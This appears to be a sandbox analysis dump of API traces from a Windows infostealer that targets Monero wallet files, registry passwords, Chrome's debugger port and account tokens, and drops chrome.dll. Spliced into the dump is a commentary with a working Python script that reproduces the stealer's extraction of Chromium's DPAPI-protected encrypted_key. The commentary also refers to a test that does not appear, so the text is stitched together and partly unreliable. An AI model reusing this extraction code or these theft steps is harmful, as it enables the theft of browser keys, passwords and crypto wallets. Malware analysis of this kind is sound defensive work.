                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 5a1dd86ebd23644611f01ef39cf091cedfba76f47ca5acfe98c10eca59429d29
                                      • Instruction ID: ec413d89488944bb60086645c01248bfacd2744c3e29be8ed7afc1497e19d815
                                      • Opcode Fuzzy Hash: 5a1dd86ebd23644611f01ef39cf091cedfba76f47ca5acfe98c10eca59429d29
                                      • Instruction Fuzzy Hash: B97155B6D00218ABDB14EBE0ED96FDE7379AF88300F004598F61596185EB74EB84DF91
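The API trace for this function reads as a single procedure: resolve CSIDL_LOCAL_APPDATA (SHGetFolderPathA with csidl 0x1C), read a file with CreateFileA/GetFileSizeEx/ReadFile, find the substring "encrypted_key":" with StrStrA, and base64-decode what follows with CryptStringToBinaryA(dwFlags = 1, CRYPT_STRING_BASE64), called twice: first with a NULL output buffer to learn the size, then to decode. That is the os_crypt.encrypted_key value of a Chromium browser's Local State file. The script below is an added example, not code from the sample or from Joe Sandbox, that reproduces exactly this step and stops where the trace stops: nothing on this page shows what the decoded blob is used for next, so it only strips the "DPAPI" prefix Chromium places in front of the DPAPI-protected key and returns the blob. The Local State document it builds is constructed, not captured.

```python
"""Reproduce the Local State key-extraction step this function performs.

Added example, not code from the sample or from Joe Sandbox. It follows the
API trace: substring search for "encrypted_key":" (StrStrA), then base64
decode (CryptStringToBinaryA with CRYPT_STRING_BASE64 = 1).
"""
from __future__ import annotations

import base64
import json

MARKER = b'"encrypted_key":"'
# Chromium base64-encodes "DPAPI" + <DPAPI blob>; the prefix is a fact about
# Chromium's os_crypt, not something shown on this page.
DPAPI_PREFIX = b"DPAPI"


def extract_encrypted_key_b64(local_state: bytes) -> bytes | None:
    """StrStrA-style substring scan, no JSON parser, as the sample does it.
    Returns the raw base64 text between the marker and the next quote."""
    idx = local_state.find(MARKER)
    if idx < 0:
        return None
    start = idx + len(MARKER)
    end = local_state.find(b'"', start)
    return local_state[start:end] if end > start else None


def recover_dpapi_blob(local_state: bytes) -> bytes | None:
    """Base64-decode the value (the two-call CryptStringToBinaryA pattern
    collapses to one decode here) and return the DPAPI blob behind the
    "DPAPI" prefix, or None when the value is missing or malformed."""
    b64 = extract_encrypted_key_b64(local_state)
    if b64 is None:
        return None
    try:
        raw = base64.b64decode(b64, validate=True)
    except (ValueError, TypeError):  # the sizing call would fail here
        return None
    if not raw.startswith(DPAPI_PREFIX):
        return None
    return raw[len(DPAPI_PREFIX):]


def constructed_local_state(fake_blob: bytes) -> bytes:
    """Build a minimal constructed Local State document. Chromium writes its
    pref files compactly (no space after the colon), which is why the
    sample's literal marker works; separators=(",", ":") reproduces that."""
    doc = {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + fake_blob).decode()}}
    return json.dumps(doc, separators=(",", ":")).encode()


if __name__ == "__main__":
    print(recover_dpapi_blob(constructed_local_state(b"\x01\x02\x03")))
```

One consequence of the sample's substring search is worth noting for detection engineering: the marker only matches the compact layout Chromium itself writes. A pretty-printed copy of Local State (a space after the colon) is invisible to this function, which is also why the `RFBBUEkBAgM=` case in the test below returns None even though its base64 is valid.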
                                      APIs
                                        • Part of subcall function 00F112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F112B4
                                        • Part of subcall function 00F112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F112BB
                                        • Part of subcall function 00F112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F112D7
                                        • Part of subcall function 00F112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F112F5
                                        • Part of subcall function 00F112A0: RegCloseKey.ADVAPI32(?), ref: 00F112FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1134F
                                      • lstrlen.KERNEL32(?), ref: 00F1135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00F11377
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F11465
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F114EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: fffccd10ce184cd49f05500d9c81f5ad117abf381be7957855f9c2b696388e9a
                                      • Instruction ID: 91f43ab638fd4b89adbe9d4dc4986208cba6ae7008855498b70dd26ff66f3c8e
                                      • Opcode Fuzzy Hash: fffccd10ce184cd49f05500d9c81f5ad117abf381be7957855f9c2b696388e9a
                                      • Instruction Fuzzy Hash: A55146B1D501295BCB15EB60EDA2FED737DAF54700F4045E8B60962081EF346B88DFA6
                                      APIs
                                      • InternetOpenA.WININET(00F30AF6,00000001,00000000,00000000,00000000), ref: 00F19A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F19AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00F19AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: a7e0ff95d89b53ee2bde935a2b96dc58d52333469704fd4c540a8e0d40932bc8
                                      • Instruction ID: 0c5da57a705582d6ba24713eae59fa8839008651631d1ace0881d4bbb5f3dae4
                                      • Opcode Fuzzy Hash: a7e0ff95d89b53ee2bde935a2b96dc58d52333469704fd4c540a8e0d40932bc8
                                      • Instruction Fuzzy Hash: 21413F76A50218ABDB18EF94DCA5FDD77B5BB48750F104098F509AB180CBB4AEC0EB90
                                      APIs
                                        • Part of subcall function 00F17330: memset.MSVCRT ref: 00F17374
                                        • Part of subcall function 00F17330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F1739A
                                        • Part of subcall function 00F17330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F17411
                                        • Part of subcall function 00F17330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1746D
                                        • Part of subcall function 00F17330: GetProcessHeap.KERNEL32(00000000,?), ref: 00F174B2
                                        • Part of subcall function 00F17330: HeapFree.KERNEL32(00000000), ref: 00F174B9
                                      • lstrcat.KERNEL32(00000000,00F3192C), ref: 00F17666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F176A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00F176BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F176EF
                                      • lstrcat.KERNEL32(00000000,00F31934), ref: 00F17700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F17733
                                      • lstrcat.KERNEL32(00000000,00F31938), ref: 00F1774D
                                      • task.LIBCPMTD ref: 00F1775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 2775064e146eb39a92a843761c8cf1d33ade6ef862bbaabef3b0da9f31ce59d4
                                      • Instruction ID: 9cc44c1972e293405b3f0dcfab851e94827928a1a32a9c08614c37be591aafeb
                                      • Opcode Fuzzy Hash: 2775064e146eb39a92a843761c8cf1d33ade6ef862bbaabef3b0da9f31ce59d4
                                      • Instruction Fuzzy Hash: 8A318376D00105EBEB18EBE0DD95DFE77B8AB44300F104118F116672D4CB34A9C6DB90
                                      APIs
                                      • memset.MSVCRT ref: 00F17374
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F1739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F17411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F1746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F174B2
                                      • HeapFree.KERNEL32(00000000), ref: 00F174B9
                                      • task.LIBCPMTD ref: 00F175B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: Password
                                      • API String ID: 2808661185-3434357891
                                      • Opcode ID: 24b288d915b96cdfdd2ec75e88e9968fb1b83da5477e058cbc797cd01e5ca9a0
                                      • Instruction ID: a3574dd6eb01c67338f6eff320db2e3539130e4abbb40d254e8f8f7a8dc9bfbb
                                      • Opcode Fuzzy Hash: 24b288d915b96cdfdd2ec75e88e9968fb1b83da5477e058cbc797cd01e5ca9a0
                                      • Instruction Fuzzy Hash: 73614DB5C0426C9BDB24DB50CC51BD9B3B9BF58300F0081E9E649A6141EFB46BC9DF90
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01D8DFC0,00000000,?,00F30E14,00000000,?,00000000), ref: 00F282C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F282C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F282E8
                                      • __aulldiv.LIBCMT ref: 00F28302
                                      • __aulldiv.LIBCMT ref: 00F28310
                                      • wsprintfA.USER32 ref: 00F2833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 7ee920ec290769c81b53a6ae083243a1654493ce9e959c940c6e7b7b6a8d4a3d
                                      • Instruction ID: a2a0369f75f982d5341e79d6347852946092ef61b2c6a79968a473a22dd6b18c
                                      • Opcode Fuzzy Hash: 7ee920ec290769c81b53a6ae083243a1654493ce9e959c940c6e7b7b6a8d4a3d
                                      • Instruction Fuzzy Hash: AC215CB1E44219ABEB14DFD4DC4AFAEBBB8FB44B10F104519F215BB2C0C77869018BA5
                                      APIs
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                      • wsprintfA.USER32 ref: 00F19E7F
                                      • memset.MSVCRT ref: 00F19EED
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F19F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F19F17
                                      • lstrcat.KERNEL32(00000000,00F312D8), ref: 00F19F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00F19F7C
                                      • memset.MSVCRT ref: 00F19F9C
                                      • Sleep.KERNEL32(00001388), ref: 00F1A013
                                        • Part of subcall function 00F299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F299C5
                                        • Part of subcall function 00F299A0: Process32First.KERNEL32(00F1A056,00000128), ref: 00F299D9
                                        • Part of subcall function 00F299A0: Process32Next.KERNEL32(00F1A056,00000128), ref: 00F299F2
                                        • Part of subcall function 00F299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F29A4E
                                        • Part of subcall function 00F299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29A6C
                                        • Part of subcall function 00F299A0: CloseHandle.KERNEL32(00000000), ref: 00F29A79
                                        • Part of subcall function 00F299A0: CloseHandle.KERNEL32(00F1A056), ref: 00F29A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 3242155833-2746444292
                                      • Opcode ID: 4e13d586502d0924cf4b5b1a0c1846fd7236072a0caa3c4f6f4eca228c28dd76
                                      • Instruction ID: 38ce6bc56f8195c896a5e8bafa3ac8c53d297c60da1c40c5f30a112eb9aabaa0
                                      • Opcode Fuzzy Hash: 4e13d586502d0924cf4b5b1a0c1846fd7236072a0caa3c4f6f4eca228c28dd76
                                      • Instruction Fuzzy Hash: EF5174B1944318ABEB24DBA0DC4AFDA7778AF44700F444598F60DAB2C1EB75AB84CF51
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                      • InternetOpenA.WININET(00F30DFB,00000001,00000000,00000000,00000000), ref: 00F1615F
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F161DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F16203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00F1622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F1625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00F16299
                                      • InternetCloseHandle.WININET(?), ref: 00F162A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00F162B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 85b40c2a0aed6c97a7c845feaf54df505ca44f4d46a8e18aaf7bddeeca31db88
                                      • Instruction ID: c4a4e56d7d4b03d2c02aa485edbd4ec10ac061e9fa7965ba268e2d98595f1714
                                      • Opcode Fuzzy Hash: 85b40c2a0aed6c97a7c845feaf54df505ca44f4d46a8e18aaf7bddeeca31db88
                                      • Instruction Fuzzy Hash: 3E5174B1A00218ABEF24DF90DC45BEE77B9AB44705F108098F605BB1C0DB74AAC5DF95
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00F9024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00F9035B
                                      • CatchIt.LIBVCRUNTIME ref: 00F903AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00F904C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 4ab53445ba5d02f5946e853689438caf8e4e050253633164950c3ae102e2f85a
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 23B16D71C00209EFEF15EFA8C8859AEBBB5FF04320F14416AE9156B212DB35DA51EF91
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BC6F
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F1BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: db492039f322519f1747c015bbddbb21242b64fb0e922c84e6dfc8a594f9563a
                                      • Instruction ID: 5ba36c7c3bc6beaa62ebe1b4db276ecf768ca342e34fa37c7e19f502d12c9bc4
                                      • Opcode Fuzzy Hash: db492039f322519f1747c015bbddbb21242b64fb0e922c84e6dfc8a594f9563a
                                      • Instruction Fuzzy Hash: 31B142729101189BCB18FBE0EDA6EEE7379BF54304F404568F50677191EF38AA48DB62
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 3d9049ee7185bfbe79cc4c163ea3afde6abda4df2754df7437d5d9423be5cae2
                                      • Instruction ID: a725c33bc924e004a001b4b3272728ed5712627ecbf21612159f069ebcd254ff
                                      • Opcode Fuzzy Hash: 3d9049ee7185bfbe79cc4c163ea3afde6abda4df2754df7437d5d9423be5cae2
                                      • Instruction Fuzzy Hash: DBF05E30948309EFE36C9FE0E40976CBBB1EF04707F1141A5F6299A1C4C6748AC09FA1
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F29850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00F208DC,C:\ProgramData\chrome.dll), ref: 00F29871
                                        • Part of subcall function 00F1A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F1A098
                                      • StrCmpCA.SHLWAPI(00000000,01D88F58), ref: 00F20922
                                      • StrCmpCA.SHLWAPI(00000000,01D89038), ref: 00F20B79
                                      • StrCmpCA.SHLWAPI(00000000,01D88F38), ref: 00F20A0C
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F20C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00F20C30
                                      • C:\ProgramData\chrome.dll, xrefs: 00F208CD
